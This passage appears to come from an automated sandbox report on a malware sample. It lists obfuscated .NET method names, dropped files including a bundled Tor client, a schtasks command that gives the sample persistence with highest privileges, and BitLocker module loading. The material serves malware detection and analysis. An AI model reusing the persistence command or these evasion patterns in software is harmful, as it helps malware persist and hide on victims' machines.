                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, MoLs8m78ESt4YD6gORW.csHigh entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, FNiqGIzN6YouuO6eE2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, LjKFJcGnQbFpADmDEj.csHigh entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, h82OGR39MMrSWBIeuA.csHigh entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.csHigh entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, NbgqbDZfxTd3FhSpvT.csHigh entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, zdH4f3pZmi7p2yCYxr.csHigh entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, oXGlh9FSyLkQpmpfLu.csHigh entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, olC9lOqWPHK88HFMTE.csHigh entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, dsMWdeSqEmuJJIBpLr.csHigh entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, uU2UPPwPJLQsRsHPyp.csHigh entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, nKKY7Tt52faTCddFBg.csHigh entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, JMKYPcVyVq6QH7wK0M.csHigh entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, vQhmVZmG0JZtewW47V.csHigh entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, wShyhrkNG0qWJND3Sv.csHigh entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, G3L0NIMHLFjsoLjt29.csHigh entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, KoO1A80rKYoteG0Jem.csHigh entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, wqc7bO7TnM3ZX08JehS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, nlGFpdxwrdyqFjguXl.csHigh entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, AdPDqvax914xQbRvHH.csHigh entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, asEp2FfC6uaqQkU7N03Xi7aMe7aH4UsqyvczX1pV8VNDEBWL6.csHigh entropy of concatenated method names: 'j9pYh7fqUtxAzfvnbuJUiOYCEky35MZza4ejy2YYNk96bR44B', 'q1AkQ9L5Ua31gmqDu5aPF3y22uEixfb6ZlGjhoexTZd0qLmZh', 'XXD17AbScLYXpeQx98rahzkAsurbeSScr7tDFtieaoG0hQF5K', 'KL3JvinUZD63lB8cBE5fll4PbD', 'hYodKkMjQwXPC9IRhVwgMwm9D5', 'M56aYRhAnyH1lN7hW7LmazOpIC', 'xtOX9br7PfuNPsxA9oqCuKteVy', 'SSi8CSEb2hT4pPBGrikeSsnWAQ', 'zHefGITeBicsks60NE9F5AYnfi', 'qldqlcyo8chVirjGfIBaIl2z2k'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.csHigh entropy of concatenated method names: 'ieoX6VrIxwtQ0f6IPxj01vCOfctxZ5l6ZE0NvjtWknPtwpRYdYVzrRYWzPIGg8WIpwMdndemoXhCbI312', '_38BK1I5SoyOeEOjEuO7IxVars2OjcCgHsEjdqW3FfcNI2nSdSoA6Ny145ZLv2Y3QgnwJUsVZr65zqEbwl', '_86Z1aL9PQfmCZRDJ4oCkARjvaFgfIzRELcAJ1Nc2Iya8HtkxUzVCRA51ZAwGkCudIKGTEzLPQ8p5E1aJL', 'Mps3WRSJwGfNLmVfvSnuZNM6KiMx9FTS0JuyrnTow0MedbgjopKaGEuXs8Qd6ua0ITPnSn0i4FjTd2utM'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, RHrnabkqggf8x5IBqT2LD4ylWiCt2ceO1BQW7adWJ6d509VvOr5xQjaZtlyl9w24v2t1BcynkEhMKVNrepe12LKHR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'AmkRhiq4pVi2iBvBtP2Bwybsvw65KyK3nCe2860OnGUeTrID2BvBcIVUop8t2pCQvdZOFbzoqsT8FrjSv', 'nJI63nP0qabprjzbDKLQTo24cK9H5b9buvOuCJHijpfhJxmY3YhhQJN2VvGF49INiiJZJkXYitl4O0M8f', '_8srhG0pKEeotPLJFpLjfJZfJIBLhT6CIGM5JqaWtOsFmkiSNqU3ceC9ZHGaCZxsYf5CHU5wwo5s5AElzL', '_6SZXnXIgpwUuaKA1cu8jnBIxvt2YcOEh500Uas57Q5zd2UXkdXEZZatZP9tV5tPpLuTtJNujdJ8bTSYhR'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.csHigh entropy of concatenated method names: 'qUJlaYtxtF3DbhjY', '_99flffu2gimXsrEvebANqrnCeLyGXDPlUR2jFNroY7z0SkWIpjEoL9v1wLRRFYStaERNXiDzM7KYmJrepx36sjnte70k7yL9GR', 'HOwVothBZbpt3MhCNzc7vZd4HU9mMZAhgshlneBdv2h5ZbK9DFVm3a2qSrciZ0OwL8Oot59rmHBc6yFuLEOTTygwL43snDyxD6', 'YlFRwAvV4R41VmGHmOT32RhVbtjp7b27d3dxRiFkqlcbCluFZexiefjrnsuljXYiTSB9yEbjVHaDopCdVjsydlt8udD1Sk5pmK', 'jcnMb4QQhDa5eCURI8L9eKMDayfrk94eDSxDyXY75Sxcgu1P5dwYXn8DvDfYnXcmvhNdVZSEprhGsDr7cLdf0KQEFyVB0nTWYy'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.csHigh entropy of concatenated method names: 'bE6Skcym1E8q1JpQvrrx3A2mPNyEYmA', '_48a39vrGguHmHwaVwCYAXZzl4LFopMc', 'KCB2eIA3VC5QdcTQ7vcWdKgaQ7sBGeN', 'sfRlsl7nZqZfuf0SM1QN7yUx75H53Rh', 'XqXnqcxyHckdUfZccMZiGWEtvihJFaC', 'CumF6z080eUonkPpjiEt8hXsb7DITXb', 'n1xP1ZOmmaiWJwC1ugklwqoJ9HSjjAZ', 'kwM3uET4iWbN6eslWcLIYG7tJxzzeK0', 'Xff0w9u7Bfzj323rrg1udqMDCrc859R', 'Hv0sdAhGuJ7WgE8AEe4vW19hUFftosp'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.csHigh entropy of concatenated method names: 'L5f6jbsrgh8yYymy', 'ggsKYphZwRQlM9am', 'Ph8AevJTp2T7ku20', 'IZCHUE2BDP769cUK', '_30rMMePn4gqbT3MH', '_6HZ8rTmwlKI6LdOE', 'r6MU5kcfW4EjU7lv', 'dCKW9WrLdnh9EaZV', 'cCVgQOQCfSUo347X', '_46XjgzRDLUSXjJjo'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, 46Vktqg7CAqVoJ3pXlNy6niu94YrpPriQQA765ga1y8jmqBJ9nrC0PNeoqVxX5rB8GTaZOIbxholzAhW49uLNc62H.csHigh entropy of concatenated method names: 'QS5snepBdQqcCOHSQp7wjYIBy9LdLD9JeyjCxuIbYWVwJ8jOguYWzcEYOC4LkBruRMAZhszhYztkH84KxhUkBmDzV', '_8VMPhDzpud4K0D4TquEusHJXknWPp7fke5kLaX1wtC0z6RrzbmqhggU9TgpCzBalnWms12hoRs1GdRw6jJwpKDU0Q', 'YBwBC1vWAUZiHjfk8nlWB5TcSRA3oPClfq6cPLrfFkoZD0CwZLN6fcGYrg2DOmIWL8fXIbXVLEWwreT4mJumY5zT7', 'zSUF79XylEJaKsEdJqtLmyb0MSbrsRFB8XsPazAu1IuUs2ZXHZkJGI31Vr4YG4yWGX1UfDD2SFJAv7sVINYQS9IW4', 'nqyYJVzhH9i1KcWmyuaLVZXlO6uZcbtvsbE9b2Y0AKTbQisK6v8LvtwrKfkcKfpCz3z567Dtj9DC5UsxsdkEN6ava', 'dCvu9PJyf7MfVS1Npc3fjhG4LSnT13v7ZN2PeUNDI9POEyjyIRUvYcaF3ABpvbu33ocVz90ihZhBEfF5BN74LMJSJ', 'JT9wDkQa6v6BdWcpbWa9WMRL3vomRHBYI0vfMhCmDg6lI1Ww2tVtA3m7AzfQA8flQbppxXKI3INXriEyYsqCUqVSq', 'SqFODOrdzvoFFQEH3vzqJpRU1o5IAywpH5Vy0K3IWfcxtEZpgEmkrLtqIsjRSB9QFq7ByCwUKbdO9S9hhRn7HeYHX', 'pGosDhHzyNeePTKPyTwr9m1xQ7KPu7GqfgyuwDSXCMZXF9hdeckF9CRPraIcI2VjcsGqlCzItThdntkZfUi85xgYx', 'KVcOKWHq70Jo70xfPEvBXDyLWzeapKnSm6ZqpwSQo4jmCd3aG92qkTHeMx612ghHxliNVcFiSakEsgUs2CX9VXuqS'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, IklJR9Egrci7AkoDGmrtlQz9KpfApOw.csHigh entropy of concatenated method names: 'Poc96CYK8OSv52z26hmXZfOp7tWv8TF', 'ExuBL3pMYZSl9913WmNbxDZhYMOjBN6', 'ecPnLK2QepjkslfNCNM1nmU9Zaz6qQu', 'rOn9thVJbMyWyrQ7urXne23OOfLKV2DnfdDEKYSs33EFmusn9TAHdExLeOqe0WnzQ0W3yUxX3hlrORKwlSbnSbxfYxFny93zD2', 'n1Kt8jjnVKwMzP4XvhIWNdjNoiHo380FoO5AfnzYBQsb2S5BSVVwbEgpADjXymXkk2K5MFA1JwtoQOkD2maMetNhc4ey4z0sra', 'bNvU1zkRVYVglK41nyb6EyKDl0mRGa5rSs56jXXGb5FkVeHpLeAaWAX3uXAbHPkPKIXiAkmCO5YJNWmTBPOmEEmQvsRvVEAT3J', 'EaUqAvoIBKIqK7lROQeEZKTApSVnfkl3jzK0Gs3HoXgVMEZssVglXUsgK8TOUzDwElRPPqWHnWsQlL2JNoOtI4Oo16AdBQ5lPa', 'GWSgsyBxh2AdxW4HIL87cGlfJCD1VRlsSaUSET9aSS7BZJXNTWSzviaSJHzSRN2HATJlo9RkRUlsrN32NWN0oocgt12kBeBEIN', 'dQojCAMlnWTBRn4ep59rv6Yy8JDR8lKfOz8mGgStmHyugnuDELiXXOy98H1uqD69PCfzjXK5L7IvLA9RXX6r9f4YruF6Ylwfgc', '_9Q0ogs17qwzhJbUyXr16HTr3BRGn4QvnoHycknKeIUDOFNZVnxlnQr5ljgSNWmkKwKTVjpEqIiDYjAKNpdwaApjPDu4jGxpZL5'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.csHigh entropy of concatenated method names: 'f6umHbcSKUEeCW91ooOAfJl9PjsmMaH', 'wkAIiThNH8epac4Ok3Gy0sk1E1UyokG', 'mJQi8aQlYBH680bsbDAcLkSWUticyzq', 'YDaJPmh0IV3zBUCXDBCT901fLwqEdOm', '_5MZAwH4gj3KSlo2yJJoL5thDudhywuf', 'gha1t9V6cwzsPueRtGncNgrVjVWduZI', 'RmzNMxHPsPlMoCYGw4xljeH3pUmG1D1', 'vKORDnbaXqyihIjqVcVn6FuJuirt36x', 'e0socU8SbuUz6ZcaJsyGEJcP8BpPuea', '_9kxN9kzg5bQyCJ2LwwMR8FggoKWuSzf'
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, rlPW4lL6JzpBKG5uTpUgtMKAdxQudep.csHigh entropy of concatenated method names: 'kBIJXv5a6rottIG83i4vMNxD8FeQAsJ', 'UXPzojRBKx1Oqz9xM4hqjeBMRGFhilZb0DpPekrUZrUFBwX4Z6QKRfIR8Q6VLG5yCxn4FdHJAk7DF12DySdVEngK8AbS6420Ua', 'N93RaNm3kVfs5sBwuxwa1snrEURzE4gpyKg3PFeRmsWQ9grkjjjD6u8KC4NOAbTgcEFuj1CrJWLrxbiBtYbrDDtY1SSUUupQr9', 'XGroXQIR91D3l4CCUv1lCuJWuRjTdcWOzPqUdCqRyHMdqmHUR0ueHXMI2rBwVL1VXstJIcfgV1hQJu7FIn7U6ueRyPjsNM3EI2', 'BqnIh4cGt3g5rOqBfzaULbx9adX0obHUPSD6WWd285Qc4G9Lax9PXlcBSFQtHOvaF5dDdTN9DNl6QLUPu8fh16LhQmfiOzzPBt'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, MoLs8m78ESt4YD6gORW.csHigh entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, FNiqGIzN6YouuO6eE2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, LjKFJcGnQbFpADmDEj.csHigh entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, h82OGR39MMrSWBIeuA.csHigh entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.csHigh entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, NbgqbDZfxTd3FhSpvT.csHigh entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, zdH4f3pZmi7p2yCYxr.csHigh entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, oXGlh9FSyLkQpmpfLu.csHigh entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, olC9lOqWPHK88HFMTE.csHigh entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, dsMWdeSqEmuJJIBpLr.csHigh entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, uU2UPPwPJLQsRsHPyp.csHigh entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, nKKY7Tt52faTCddFBg.csHigh entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, JMKYPcVyVq6QH7wK0M.csHigh entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, vQhmVZmG0JZtewW47V.csHigh entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, wShyhrkNG0qWJND3Sv.csHigh entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, G3L0NIMHLFjsoLjt29.csHigh entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, KoO1A80rKYoteG0Jem.csHigh entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, wqc7bO7TnM3ZX08JehS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, nlGFpdxwrdyqFjguXl.csHigh entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, AdPDqvax914xQbRvHH.csHigh entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeFile created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeJump to dropped file
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile created: C:\Users\user\AppData\Local\Temp\ffmaba.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dllJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
